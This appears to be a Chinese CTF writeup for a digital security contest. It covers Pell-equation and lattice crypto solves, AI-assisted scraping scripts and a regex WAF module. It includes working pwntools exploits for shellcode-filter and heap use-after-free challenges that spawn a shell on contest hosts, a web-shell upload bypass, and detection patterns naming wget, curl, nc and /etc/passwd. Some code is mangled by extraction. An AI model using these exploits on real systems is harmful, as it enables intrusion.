数字中国创新大赛-数字安全赛道 Writeup

admin

140800
文章

117
评论

2025年4月7日23:40:09评论27 views字数 32950阅读109分50秒阅读模式

数据安全题

1、AS

本题中根据其示例，不难看出AS(a, d, n)的描述意为以a为首项，d为末项，n为项数的等差数列求和。

根据本题的交互描述，我们需求得

满足

并且

对级数进行求和，整理后得到我们的目标方程是：

将之视为关于n1的方程，求根公式得：

显然n1是一个整数，需要找到方程：

的一组整数解 (k, n2)。这是D = 10558 + 4 的佩尔(Pell)方程，可以利用 sagemath 结合连分数求解。

但获得的解不一定满足

还需要对之进行拓展。

假设存在pell方程的任意两组解

由于

左右分别相乘得

整理后得

即：

也是对于该 D 的 pell 方程的一组解。

以矩阵乘法的形式表现之，可以得到递推公式：

故获得

后以此递推，直至

均不小于

将之发送至交互端即可。

exp：

__import__('os').environ['TERM'] = 'xterm'

from pwn import *

# solve n2^2 - 84464n1^2 == 1 via continued fraction
# Seek a basic solution first
def Pell(D:int,lim:int = 200):
    tp = continued_fraction(sqrt(D))
    for i in range(lim):
        dd = tp.denominator(i)
        nn = tp.numerator(i)
        if nn^2 - D*dd^2 == 1:
            return nn,dd

    returnNone

const = 0x149f * 8
x0,y0 = Pell(const)

mt = matrix(ZZ,2,2,[x0,const*y0,y0,x0])
vc = matrix(ZZ,2,1,[x0,y0])

while vc[0,0] < 2**0x149for vc[1,0] < 2**0x149f:
    vc = mt * vc

n2 = vc[1,0]
n1 = (vc[0,0] - 1) // 2

assert0x149f * (n2^2) == n1 * (n1+1) // 2

io = remote('47.117.188.15',32994)
io.sendlineafter(b'choice:',b'2')
io.sendlineafter(b'n1~',str(n1).encode())
io.sendlineafter(b'n2~',str(n2).encode())
io.interactive()

得到答案：

b7133d84297c307a92e70d7727f55cbc

2、scsc

Start第一个参数是就是main，就能找到主逻辑。

进入第一个参数

一眼就看出是setbuf，直接看下一个函数。

没法转成C代码，将这个位置的call给nop掉方便分析，下图就是分析后，修改函数名和变量名的伪C代码。

主题逻辑就是aes 128 ECB解密 + 过滤shellcode，要求我们输入的shellcode经过aes加密后并且不能出现被禁止出现的字符，经过调试发现pop和push可以使用，所以我们用pop push来代替mov（mov被禁用了），调试利用栈上的寄存器的数据构造一个read，输入getshell的shellcode再jmp到这里执行。

from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
context(arch='amd64',log_level='debug')
file = './scsc'
io = remote('47.117.188.15',32995)
elf = ELF(file)
libc = elf.libc
# gdb.attach(io,'b *0x400C45')
s       = lambda data               :io.send(data)
sa      = lambda text,data          :io.sendafter(text, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda text,data          :io.sendlineafter(text, data)
r       = lambda num=4096           :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda text               :io.recvuntil(text)
uu32    = lambda                    :u32(io.recvuntil(b"xf7")[-4:].ljust(4,b"x00"))
uu64    = lambda                    :u64(io.recvuntil(b"x7f")[-6:].ljust(8,b"x00"))
inf     =  lambda s                 :info(f"{s} ==> 0x{eval(s):x}")
key = b'862410c4f93b77b4'
aes = AES.new(key,AES.MODE_ECB)

shellcode = asm(
    '''
    push rdi
    push r15
    pop rdi
    pop rsi
    add edx,0x80
    push r15
    pop rax
    syscall
    jmp rsi
    '''
)
print(len(shellcode))
sla(b'magic data:n',aes.encrypt(pad(shellcode,AES.block_size)))
pause()
s(asm(shellcraft.sh()))
# gdb.attach(io)
io.interactive()

得到答案：

765157198323069450

3、ez_upload

简单的绕过一下文件后缀即可，最后发现这样构造可以绕过它的后端逻辑

1.jpg.jpg.php.phtml成功上传，蚁剑连一下找到RSA密钥文件

得到答案：

/var/www/rssss4a

5、Boh

功能齐全，没有及时清空指针，存在uaf，申请大小也可以申请到large bin，直接泄露libc，用uaf打free hook就可以。

2.31直接打free_hook

exp:

from pwn import *
context(arch='amd64',log_level='debug')
file = './boh'
io = process(file)
io = remote('47.117.32.105',32831)
elf = ELF(file)
libc = elf.libc
# gdb.attach(io)
s       = lambda data               :io.send(data)
sa      = lambda text,data          :io.sendafter(text, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda text,data          :io.sendlineafter(text, data)
r       = lambda num=4096           :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda text               :io.recvuntil(text)
uu32    = lambda                    :u32(io.recvuntil(b"xf7")[-4:].ljust(4,b"x00"))
uu64    = lambda                    :u64(io.recvuntil(b"x7f")[-6:].ljust(8,b"x00"))
inf     =  lambda s                 :info(f"{s} ==> 0x{eval(s):x}")

menu = lambda s : sla(b'->>>>>> n',str(s))

def add(size):
    menu(1)
    sla(b'storage:n',str(size))
    
def free(idx):
    menu(2)
    sla(b'space: n',str(idx))
    
def show(idx):
    menu(3)
    sla(b'show data: n',str(idx))

def edit(idx,content):
    menu(4)
    sla(b'storage space:n',str(idx))
    sla(b'data:n',content)

add(0x410)#0
add(0x10)#1
add(0x10)#2
free(0)
show(0)
libc.address = u64(r(6).ljust(8,b'x00'))-0x1ecbe0
inf('libc.address')
free(1)
free(2)
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
edit(2,p64(__free_hook))
add(0x10)#3
add(0x10)#4
edit(4,p64(system))

edit(3,b'/bin/shx00')
free(3)
# gdb.attach(io)
io.interactive()

得到答案：

725567201628166747

7、RSSA

题目分为两部分，第一部分是一个简单的p高位，直接打就行

from Crypto.Util.number import long_to_bytes, inverse

a = 0xb0ee0627166579753f354ced7cdb6701a5ebbfaec3cd6af76decc33f95a765bd7e5f758e2076c42a76f5af867152757b97242034693f309973ffdebe4a5ce3dd822260dfa8a8d51f9aac7550474a3a4fe37ecea6cdc23b0cbba5aa6d0d93e9b10000000000000000000000000000000000000000000000000000000000000000
n = 0x6b9f0bf43d3e9b3278d52b3cfaafadf9449048f8297fedf8f8909a030156a23c68552b5379adbf32fd9584aa42f694c8227d275f40391c7872400eda97c2b79f8349af6492c7b6ac12bae303cee1eb9b6059e5891a6535ca8310e9ba145b7b4d403d8e666e5a55a94e5f7dabe22b80032e936233d7a1f0e96b95aeb4249b8ea34ef8bf422ce9f725844478ee15b739dd70cc6e2c0bd0cb24d7d14baf66c5aca2023c24339d3b90eecb0e2568c148d438a5ce84270ce11159e3aa4d48ac8b2185c2fe8cb328e8f80602c9d7ae49799538154d325700349bb7cd2fb694fb9f8cbcf2ebced8f6c29a05c64aa78a036416c28e6e7b937a371c98feed2d826ca9ed63
c = 0x4dba2f194b97d4dac89548c035bf18d708fb9edfd6b7706e6d7871c6129931cde88718bdcbd1e8410f1e7a4c709bdf9d31572ee371816e1d11e15e491d843a7277684202bc45e23f9f1b2e3a808bde94343a47a6a22b339aa651568ff55994260039defd790c0eb0abcf90730ecf3e097316ca87e607974544866a54d23aaaf2d089e346a68437a55afc4750b9ea1d7efcb7a6fd55c694a168f186531f0e8abb2dee73ff50ebeb2a39e1e9842013dc410e09987783cdd8e234a55388fffc025b1fe3b4036d6181ac8e6ec4d9c0822c012ac861b242b2c94433209369d0f271110d007202118e566646940f12179ee05b4e1b3c1871f09a4dbfe381d625c1166a

# R.<pl> = Zmod(n)[]
# f = a + pl
# f.small_roots(X = 2 ^ 256, beta = 0.4)

# [110067511155576927475483955985691251899018061510394100496162045480774969932831]

p = a + 110067511155576927475483955985691251899018061510394100496162045480774969932831
assert n % p == 0
q = n // p
d = inverse(65537, (p - 1) * (q - 1))
print(long_to_bytes(pow(c, d, n)))
print(p)

'''
b'Ohhhh~You get hint!!!Keep in mind~[n = 45]'
124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
'''

至于第二部分的话，实际上是一个aHSSP

推导过程如下

我们可以找到矩阵M满足

只要构造如下的格且该格满足

这边的M实际上是一个195x195的矩阵，因为里面都是0和1，所以我们可以尝试去M的右核里面去找看看（这边的M的维度应该是150x195的，所以我们只要取前150行就可以了）

只要构造如下的格且该格满足

注意这边拿到的X并不是真正的（详细可以参考博客正交格系列），但是问题不大

https://suhanhan-cpu.github.io/2024/12/25/%E6%AD%A3%E4%BA%A4%E6%A0%BC/

因为我们的最终目标是要求flag，所以还有

是未知的

这边的话我们可以再寻找一个M，满足

只要构造如下的格且该格满足

且这个M满足

只有

是未知的，直接解 solve_right 就可以了，最后只剩下一个flag未知，直接解就可以了。

exp：

from Crypto.Util.number import long_to_bytes, inverse
import sys

m = 195
p = 124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
n = 45
e = [120635576780857099657620422019491667950637170186261766488249957828101239821610861518495961975710066638520498229677519800712633055043550730643234194347835439199667651171556101367356729814929996606786087277351926872195105074654968586964552478307790575605576014239366139242875073444131258126343424336890783150309, 
........,     16570857330001161437081797539745235338452074798277781589774705553122533105850958634339195895311067183300988106765263243795546563100147007547647005974776204361881593633909132021169586592129671672598144891664471653825793606919922500965579833270962102770368923656499510042162125178062583146066422387408158422047]
# h = Matrix(ZZ, 195, 1, h)
# e = Matrix(ZZ, 195, 1, e)

h = vector(h)
e = vector(e)
L = block_matrix(ZZ, [[matrix((h, e)).T, matrix.identity(195)], 
                      
])
L[:, :2] *= p
L = L.LLL()
res = []
for row in L:
    if row[:2] == 0:
        res.append(row[2:])
M = matrix(res)
# print(M.nrows())  #195
# print(M.ncols())  #195


assert all(i == 0for i in M * h % p)
assert all(i == 0for i in M * e % p)

L = block_matrix(ZZ, [[matrix(M[ : 150]).T, matrix.identity(195)]])
L[:, :150] *= p
L = L.LLL()
res = []
for row in L:
    if row[:150] == 0:
        res.append(row[150:])
X = matrix(res).T


L = block_matrix(ZZ, [[matrix(e).T, matrix.identity(195)], 
                      
])
L[:, :1] *= p
L = L.LLL()
res = []
for row in L:
    if row[0] == 0:
        res.append(row[1:])
Me = matrix(res)
assert all(i == 0for i in Me * e % p)



s = (Me * matrix(GF(p), X)).solve_right(Me * h)
flag = (X * s - h)[0] / e[0]
print(long_to_bytes(int(flag)))

#b'card:4111111111111123,exp_date:2025-12'

最后拿去md5就可以了

得到答案：

a01f461a6ca2936342b269b55e8de03e

模型安全题

1、数据预处理任务1

用gpt写一个脚本，分两个写,第一个是sklearn识别,用投毒那个题给的模型分析，还有就是写一个爬虫，用soap解析html就行。

import hashlib
from bs4 import BeautifulSoup
from app import ChineseSentimentAnalyzer, analyzer
import requests
import csv
from typing import List, Dict, Optional

class ReviewScraper:
    """用于抓取和处理产品评论的类"""

    def __init__(self):
        self.data: List[List[str]] = []

    @staticmethod
    def generate_md5(text: str) -> str:
        """计算字符串的32位小写MD5哈希值

        Args:
            text: 要计算哈希的字符串

        Returns:
            32位小写MD5哈希值
        """
        return hashlib.md5(text.encode('utf-8')).hexdigest()

    def parse_review_item(self, item) -> Optional[Dict[str, str]]:
        """解析单个评论项

        Args:
            item: BeautifulSoup解析的评论项

        Returns:
            包含评论信息的字典，如果解析失败返回None
        """
        try:
            user_id = item.find('span', class_='user-id').get_text(strip=True).replace('用户ID：', '')
            username = item.find('span', class_='reviewer-name').get_text(strip=True).replace('用户名：', '')
            phone = item.find('span', class_='reviewer-phone').get_text(strip=True).replace('联系电话：', '')
            content = item.find('div', class_='review-content').get_text(strip=True)

            signature = self.generate_md5(user_id + username + phone)
            label = analyzer.analyze_comment_with_confidence(content)["sentiment"]

            return {
                "user_id": user_id,
                "username": username,
                "phone": phone,
                "content": content,
                "signature": signature,
                "label": label
            }
        except Exception as e:
            print(f"Error parsing review item: {e}")
            returnNone

    def process_page(self, html: str) -> None:
        """处理单个页面的HTML内容

        Args:
            html: 要解析的HTML字符串
        """
        soup = BeautifulSoup(html, 'html.parser')
        review_items = soup.find_all('div', class_='review-item')

        for item in review_items:
            result = self.parse_review_item(item)
            if result:
                self.data.append([
                    result["user_id"],
                    int(result["label"]),
                    result["signature"]
                ])

    def scrape_pages(self, start: int, end: int, base_url: str) -> None:
        """抓取指定范围内的页面

        Args:
            start: 起始页码
            end: 结束页码
            base_url: 基础URL格式字符串，应包含一个{}用于格式化页码
        """
        for i in range(start, end + 1):
            try:
                url = base_url.format(i)
                response = requests.get(url)
                response.raise_for_status()

                self.process_page(response.text)
                print(f"Processed page {i}")
            except requests.RequestException as e:
                print(f"Error fetching page {i}: {e}")

    def save_to_csv(self, filename: str) -> None:
        """将数据保存到CSV文件

        Args:
            filename: 要保存的文件名
        """
        with open(filename, "w", newline="", encoding="utf-8") as f:
            writer = csv.writer(f)
            writer.writerows(self.data)
        print(f"Data saved to {filename}")

if __name__ == "__main__":
    scraper = ReviewScraper()
    scraper.scrape_pages(
        start=1,
        end=500,
        base_url="http://47.117.188.170:33073/index.php?controller=product&action=detail&id={}"
    )
    scraper.save_to_csv("output.csv")

app.py

import re
import jieba
import joblib
from sklearn.feature_extraction.text import TfidfVectorizer
from typing import Dict, Any, Optional, Union
from pathlib import Path

class ChineseSentimentAnalyzer:
    """中文情感分析器，封装文本预处理、特征提取和情感预测功能"""

    def __init__(self, model_path: Union[str, Path], vectorizer_path: Union[str, Path]):
        """初始化情感分析器

        Args:
            model_path: 训练好的模型文件路径(.pkl)
            vectorizer_path: TF-IDF向量化器文件路径(.pkl)

        Raises:
            FileNotFoundError: 如果模型文件不存在
            ValueError: 如果加载的模型或向量化器无效
        """
        self.model = self._load_pickle(model_path, "model")
        self.vectorizer = self._load_pickle(vectorizer_path, "vectorizer")

    @staticmethod
    def _load_pickle(file_path: Union[str, Path], resource_type: str) -> Any:
        """安全加载pickle文件

        Args:
            file_path: pickle文件路径
            resource_type: 资源类型描述(用于错误信息)

        Returns:
            加载的对象

        Raises:
            FileNotFoundError: 如果文件不存在
            ValueError: 如果加载的对象无效
        """
        try:
            with open(file_path, 'rb') as f:
                obj = joblib.load(f)
                if obj isNone:
                    raise ValueError(f"Loaded {resource_type} is None")
                return obj
        except FileNotFoundError:
            raise FileNotFoundError(f"{resource_type.capitalize()} file not found at {file_path}")
        except Exception as e:
            raise ValueError(f"Failed to load {resource_type}: {str(e)}")

    @staticmethod
    def preprocess_text(text: str) -> str:
        """中文文本预处理

        Args:
            text: 原始文本

        Returns:
            预处理后的文本(分词后以空格连接)
        """
        # 移除特殊字符、标点符号和数字
        cleaned_text = re.sub(r'[^u4e00-u9fa5]', '', text)
        # 使用jieba进行分词并重新组合
        return' '.join(jieba.cut(cleaned_text))

    def analyze_sentiment(self, text: str) -> int:
        """分析中文文本情感倾向

        Args:
            text: 要分析的文本

        Returns:
            情感倾向结果 (0表示负面, 1表示正面)

        Raises:
            ValueError: 如果输入文本为空或预处理后无效
        """
        ifnot text ornot text.strip():
            raise ValueError("Input text cannot be empty")

        processed_text = self.preprocess_text(text)
        text_vector = self.vectorizer.transform([processed_text])
        return self.model.predict(text_vector)[0]

    def analyze_comment_with_confidence(self, comment: str) -> Dict[str, Any]:
        """分析中文评论情感倾向，包含置信度信息

        Args:
            comment: 要分析的评论内容

        Returns:
            包含分析结果的字典:
            {
                'text': 原始文本,
                'sentiment': 情感倾向(0/1),
                'confidence': 置信度(0-1),
                'error': 错误信息(如果有)
            }
        """
        try:
            ifnot comment ornot comment.strip():
                raise ValueError("Comment text cannot be empty")

            processed_text = self.preprocess_text(comment)
            text_vector = self.vectorizer.transform([processed_text])

            result = {
                'text': comment,
                'sentiment': self.model.predict(text_vector)[0]
            }

            # 如果模型支持概率预测，则添加置信度
            if hasattr(self.model, 'predict_proba'):
                proba = self.model.predict_proba(text_vector)[0]
                result['confidence'] = float(max(proba))

            return result
        except Exception as e:
            return {
                'text': comment,
                'error': str(e)
            }

def create_analyzer(model_path: Union[str, Path],
                    vectorizer_path: Union[str, Path]) -> ChineseSentimentAnalyzer:
    """创建中文情感分析器实例

    Args:
        model_path: 模型文件路径
        vectorizer_path: 向量化器文件路径

    Returns:
        ChineseSentimentAnalyzer实例
    """
    return ChineseSentimentAnalyzer(model_path, vectorizer_path)

analyzer = create_analyzer(
model_path="./models/sentiment_model.pkl",
vectorizer_path="./models/tfidf_vectorizer.pkl"
)

最后手动用execl给uuser_id排序然后加上表头就ok了

答案：已提交文件

2、数据预处理任务2

先request库遍历所有分页（1到84页），收集每个商品的ID、名称和销量。然后将销量中的非数字或负数转换为0。再访问每个商品的详情页，统计用户评论的数量。然后根据商品名称中的关键词匹配对应的分类ID。最后根据商品名称中的关键词匹配对应的分类ID。脚本如下：

import requests
from bs4 import BeautifulSoup
import csv
import time

# 配置
base_url = 'http://47.117.188.15:33001/index.php?controller=home&action=index&page={}'
detail_url_template = 'http://47.117.188.15:33001/index.php?controller=product&action=detail&id={}'

# 分类关键词配置（优化后）
category_keywords = {
    1: ['手机', '智能机', '通话', 'ONEPLUS', 'Ace', '天玑', '旗舰', '快充','音量','Phone','性能','折叠屏','复古','自拍'],
    2: ['母婴', '婴儿', '孕妇', '奶粉', '尿布', '童装'],
    3: ['家居', '家装', '家具', '沙发', '窗帘', '家饰'],
    4: ['书', '书籍', '著作', '出版', '科普', '科学著作','描绘','探讨','分析','叙','情节','讲述','背景','展现','宏观'],
    5: ['蔬菜', '青菜', '生菜', '白菜', '萝卜', '黄瓜'],
    6: ['厨房', '厨具', '锅', '刀具', '电磁炉'],
    7: ['办公', '打印机', '文具', '复印机'],
    8: ['水果', '苹果', '香蕉', '芒果', '桑葚', '葡萄','西瓜','草莓','猕猴桃','果肉','果实','哈密瓜','果皮'],
    9: ['宠物', '狗粮', '猫砂', '宠物用品', '鱼缸'],
    10: ['运动', '跑步', '健身', '瑜伽', '球类'],
    11: ['热水器', '速热', '恒温', '节能防干烧', '卫浴','壁挂','防漏电'],
    12: ['彩妆', '口红', '眼影', '粉底', '化妆品','香水'],
    13: ['保健品', '维生素', '钙片', '蛋白粉'],
    14: ['酒', '酒水', '啤酒', '白酒', '葡萄酒'],
    15: ['玩具', '乐器', '积木', '钢琴', '吉他'],
    16: ['汽车', '车饰', '车载', '轮胎'],
    17: ['床单', '被套', '枕头', '床垫', '床上用品'],
    18: ['洗发水', '沐浴露', '护发素', '洗护','清洁','滋养'],
    19: ['五金', '螺丝', '钳子', '电钻'],
    20: ['户外', '帐篷', '登山', '露营'],
    21: ['珠宝', '钻石', '项链', '戒指'],
    22: ['医疗', '器械', '体温计', '血压计'],
    23: ['花卉', '花卉园艺', '盆栽', '花盆'],
    24: ['游戏', '游戏机', '电竞', 'PS5'],
    25: ['园艺', '修剪', '花园工具', '园林']
}

# 生成关键词列表并按长度排序
keywords_list = []
for cid, keys in category_keywords.items():
    for key in keys:
        keywords_list.append((key, cid))
keywords_list.sort(key=lambda x: len(x[0]), reverse=True)

def get_category_id(name):
    for keyword, cid in keywords_list:
        if keyword in name:
            return cid
    return1# 默认值，需人工核查

# 爬取商品列表
product_list = []
for page in range(1, 85):
    print(f"爬取第 {page} 页...")
    try:
        response = requests.get(base_url.format(page))
        soup = BeautifulSoup(response.text, 'html.parser')
        for card in soup.find_all('div', class_='product-card'):
            product_id = int(card['data-id'])
            name = card.find(class_='product-name').text.strip()
            sales_text = card.find(class_='product-sales').text.strip()
            # 处理销量
            sales = 0
            digits = ''.join(filter(str.isdigit, sales_text))
            if digits:
                sales = max(0, int(digits))  # 排除负数
            product_list.append({
                'product_id': product_id,
                'name': name,
                'sales': sales,
                'reviews': None# 后续填充
            })
        time.sleep(0.5)
    except Exception as e:
        print(f"第 {page} 页错误: {e}")

# 分类匹配
for product in product_list:
    product['category_id'] = get_category_id(product['name'])

# 排序并写入CSV
product_list.sort(key=lambda x: x['product_id'])
with open('submit_2.csv', 'w', newline='', encoding='utf-8') as f:
    writer = csv.writer(f)
##    writer.writerow(['product_id', 'sales', 'category_id', 'reviews'])
    writer.writerow(['product_id', 'sales', 'category_id'])
    for p in product_list:
##        writer.writerow(
, p['sales'], p['category_id'], p['reviews']])
        writer.writerow(
, p['sales'], p['category_id']])

print("处理完成！结果已保存到 submit_2.csv")

答案：上传了csv文件

3、数据预处理任务3

同样的用gpt跑一个

robot.py

import hashlib
from bs4 import BeautifulSoup
import requests
import csv
from typing import List, Dict, Optional
from dataclasses import dataclass
import waf

@dataclass
class ReviewData:
    """存储单条评论数据的类"""
    user_id: str
    username: str
    phone: str
    content: str
    signature: str
    user_agent: str

class ReviewScraper:
    """产品评论爬取和分析器"""

    def __init__(self):
        self.data: List[List[str]] = []
        self.waf = waf.WAF()

    @staticmethod
    def mask_phone(phone: str) -> str:
        """手机号脱敏处理，保留前3位和后4位

        Args:
            phone: 原始手机号字符串

        Returns:
            脱敏后的手机号字符串
        """
        return phone[:3] + "****" + phone[-4:] if len(phone) == 11else phone

    @staticmethod
    def generate_md5(text: str) -> str:
        """生成字符串的MD5哈希值

        Args:
            text: 要哈希的字符串

        Returns:
            32位小写MD5哈希值
        """
        return hashlib.md5(text.encode('utf-8')).hexdigest()

    def parse_review_item(self, item) -> Optional[ReviewData]:
        """解析单个评论项

        Args:
            item: BeautifulSoup解析的评论项元素

        Returns:
            解析后的ReviewData对象，解析失败返回None
        """
        try:
            return ReviewData(
                user_id=item.find('span', class_='user-id').get_text(strip=True).replace('用户ID：', ''),
                username=item.find('span', class_='reviewer-name').get_text(strip=True).replace('用户名：', ''),
                phone=item.find('span', class_='reviewer-phone').get_text(strip=True).replace('联系电话：', ''),
                content=item.find('div', class_='review-content').get_text(strip=True),
                signature=self.generate_md5(
                    item.find('span', class_='user-id').get_text(strip=True) +
                    item.find('span', class_='reviewer-name').get_text(strip=True) +
                    item.find('span', class_='reviewer-phone').get_text(strip=True)
                ),
                user_agent=item.find('span', class_='user-agent').get_text(strip=True).replace('使用设备：', '')
            )
        except Exception as e:
            print(f"Error parsing review item: {e}")
            returnNone

    def process_page(self, html: str) -> None:
        """处理单个页面的HTML内容

        Args:
            html: 要解析的HTML字符串
        """
        soup = BeautifulSoup(html, 'html.parser')

        for item in soup.find_all('div', class_='review-item'):
            review = self.parse_review_item(item)
            if review:
                is_safe = "TRUE"ifnot self.waf.detect_all(review.user_agent)['is_malicious'] else"FALSE"
                self.data.append([
                    review.user_id,
                    self.mask_phone(review.phone),
                    is_safe
                ])

    def scrape(self, start_id: int, end_id: int, base_url: str) -> None:
        """爬取指定范围内的产品页面

        Args:
            start_id: 起始产品ID
            end_id: 结束产品ID
            base_url: 基础URL格式字符串，包含一个{}用于格式化产品ID
        """
        for product_id in range(start_id, end_id + 1):
            try:
                response = requests.get(base_url.format(product_id))
                response.raise_for_status()
                self.process_page(response.text)
                print(f"Processed product ID: {product_id}")
            except requests.RequestException as e:
                print(f"Error fetching product ID {product_id}: {e}")

    def save_to_csv(self, filename: str) -> None:
        """将数据保存到CSV文件

        Args:
            filename: 要保存的文件名
        """
        with open(filename, "w", newline="", encoding="utf-8") as f:
            csv.writer(f).writerows(self.data)
        print(f"Data saved to {filename}")

if __name__ == "__main__":
    scraper = ReviewScraper()
    scraper.scrape(
        start_id=1,
        end_id=500,
        base_url="http://47.117.188.170:33073/index.php?controller=product&action=detail&id={}"
    )
    scraper.save_to_csv("output.csv")

waf.py

import re
from urllib.parse import unquote
from typing import Dict, Tuple, Optional, List, Pattern, Union

class WAF:
    """
    Web应用防火墙(WAF)模块 - 增强版

    功能:
    - SQL注入检测
    - XSS(跨站脚本)检测
    - 命令注入检测
    - 路径遍历检测
    - 敏感信息检测
    - 自定义规则支持
    - 性能优化
    - 攻击日志记录

    接口保持与之前版本兼容
    """

    def __init__(self, strict_mode: bool = False, enable_logging: bool = False):
        """
        初始化WAF

        :param strict_mode: 严格模式(检测更多潜在威胁但可能有更高误报率)
        :param enable_logging: 是否启用攻击日志记录
        """
        self.strict_mode = strict_mode
        self.enable_logging = enable_logging
        self.attack_log = []
        self.custom_rules = []
        self._init_patterns()

    def _init_patterns(self) -> None:
        """初始化检测规则"""
        # 预编译所有正则表达式以提高性能
        self._rules = {
            'sql_injection': [
                (re.compile(
                    r"(['"])?.*(union|select|insert|update|delete|drop|alter|create|truncate|rename|exec|execute|grant|revoke|declare|fetch).*?1",
                    re.I), "SQL注入关键字"),
                (re.compile(r"b(and|or)bs*[d"']+s*=s*[d"']+", re.I), "SQL逻辑注入"),
                (re.compile(r"b(and|or)bs*[w"']+s*[=<>]+s*[w"']+", re.I), "SQL条件注入"),
                (re.compile(r"sleeps*(s*d+s*)", re.I), "SQL延时函数"),
                (re.compile(r"benchmarks*(.*?,.*?)", re.I), "SQL基准测试函数"),
                (re.compile(r"waitfors+delays+['"].+?['"]", re.I), "SQL延时语句"),
            ],
            'xss': [
                (re.compile(r"<script.*?>.*?</script>", re.I), "脚本标签"),
                (re.compile(r"javascripts*:", re.I), "JavaScript协议"),
                (re.compile(r"on[a-z]+s*=", re.I), "事件处理器"),
                (re.compile(r"<iframe.*?>", re.I), "iframe标签"),
                (re.compile(r"<img.*?src=.*?>", re.I), "img标签"),
                (re.compile(r"<svg.*?>", re.I), "SVG标签"),
                (re.compile(r"alerts*(.*?)", re.I), "alert函数"),
                (re.compile(r"document.cookie", re.I), "Cookie访问"),
                (re.compile(r"evals*(.*?)", re.I), "eval函数"),
            ],
            'command_injection': [
                (re.compile(
                    r"[;&|]s*(ls|dir|cat|type|more|less|whoami|id|pwd|echo|rm|del|mv|cp|chmod|chown|wget|curl|ftp|nc|telnet|ssh|ping|nslookup)b",
                    re.I), "命令拼接"),
                (re.compile(r"b(rm|del|mv|cp|chmod|chown)b.*?[;&|]", re.I), "危险命令"),
                (re.compile(r"$((|{).*?()|})", re.I), "变量扩展"),
                (re.compile(r"`.*?`", re.I), "反引号命令"),
                (re.compile(r"b(exec|system|passthru|shell_exec|popen|proc_open|pcntl_exec)s*(.*?)", re.I),
                 "PHP命令执行"),
            ],
            'path_traversal': [
                (re.compile(r"(../)+", re.I), "目录遍历(Unix)"),
                (re.compile(r"(..\)+", re.I), "目录遍历(Windows)"),
                (re.compile(r"/etc/passwd", re.I), "敏感文件访问"),
                (re.compile(r"/proc/self/environ", re.I), "环境变量访问"),
                (re.compile(r"c:\windows\", re.I), "Windows系统目录"),
            ],
            'sensitive_info': [
                (re.compile(r"b(password|passwd|pwd|secret|token|api_key|access_key|auth)s*=s*['"]?[w-]+['"]?",
                            re.I), "敏感信息泄露"),
                (re.compile(r"bd{4}[- ]?d{4}[- ]?d{4}[- ]?d{4}b"), "信用卡号"),
                (re.compile(r"bd{3}[- ]?d{2}[- ]?d{4}b"), "社会安全号"),
            ]
        }

        if self.strict_mode:
            self._add_strict_rules()

    def _add_strict_rules(self) -> None:
        """添加严格模式下的额外规则"""
        self._rules['sql_injection'].extend([
            (re.compile(r"b(like|where|from|having)b", re.I), "SQL关键字"),
            (re.compile(r"--|#", re.I), "SQL注释"),
        ])
        self._rules['xss'].append(
            (re.compile(r"<.*?>", re.I), "HTML标签")
        )

    def add_custom_rule(self, rule_name: str, pattern: Union[str, Pattern], description: str = "") -> None:
        """
        添加自定义检测规则

        :param rule_name: 规则名称
        :param pattern: 正则表达式模式(字符串或已编译的正则表达式)
        :param description: 规则描述
        """
        if isinstance(pattern, str):
            compiled_pattern = re.compile(pattern, re.I)
        else:
            compiled_pattern = pattern

        if rule_name notin self._rules:
            self._rules[rule_name] = []

        self._rules[rule_name].append((compiled_pattern, description))
        self.custom_rules.append((rule_name, pattern.pattern if hasattr(pattern, 'pattern') else pattern, description))

    def _log_attack(self, attack_type: str, pattern: str, input_str: str) -> None:
        """记录攻击尝试"""
        if self.enable_logging:
            log_entry = {
                'type': attack_type,
                'pattern': pattern,
                'input': input_str,
                'timestamp': datetime.datetime.now().isoformat()
            }
            self.attack_log.append(log_entry)

    def detect(self, input_str: str, rule_type: str) -> Tuple[bool, Optional[str]]:
        """
        检测特定类型的攻击

        :param input_str: 输入字符串
        :param rule_type: 规则类型(sql_injection|xss|command_injection|path_traversal|sensitive_info)
        :return: (是否检测到攻击, 匹配的模式描述)
        """
        if rule_type notin self._rules:
            returnFalse, None

        decoded = unquote(input_str)
        for pattern, description in self._rules[rule_type]:
            if pattern.search(decoded):
                self._log_attack(rule_type, description, input_str)
                returnTrue, description
        returnFalse, None

    def detect_sql_injection(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'sql_injection')

    def detect_xss(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'xss')

    def detect_command_injection(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'command_injection')

    def detect_path_traversal(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'path_traversal')

    def detect_sensitive_info(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'sensitive_info')

    def detect_all(self, input_str: str) -> Dict[str, Union[bool, Tuple[bool, Optional[str]]]]:
        """
        检测所有类型的攻击

        :param input_str: 输入字符串
        :return: 包含所有检测结果的字典
        """
        results = {
            'sql_injection': self.detect_sql_injection(input_str),
            'xss': self.detect_xss(input_str),
            'command_injection': self.detect_command_injection(input_str),
            'path_traversal': self.detect_path_traversal(input_str),
            'sensitive_info': self.detect_sensitive_info(input_str),
        }

        # 检查自定义规则
        custom_results = {}
        for rule_name in set(self._rules.keys()) - {'sql_injection', 'xss', 'command_injection', 'path_traversal',
                                                    'sensitive_info'}:
            custom_results[rule_name] = self.detect(input_str, rule_name)

        results.update(custom_results)
        results['is_malicious'] = any(result[0] for result in results.values() if isinstance(result, tuple))

        return results

    def get_attack_log(self) -> List[Dict]:
        """获取攻击日志"""
        return self.attack_log.copy()

    def clear_attack_log(self) -> None:
        """清空攻击日志"""
        self.attack_log.clear()

    @staticmethod
    def sanitize_input(input_str: str, max_length: Optional[int] = None) -> str:
        """
        输入清理函数

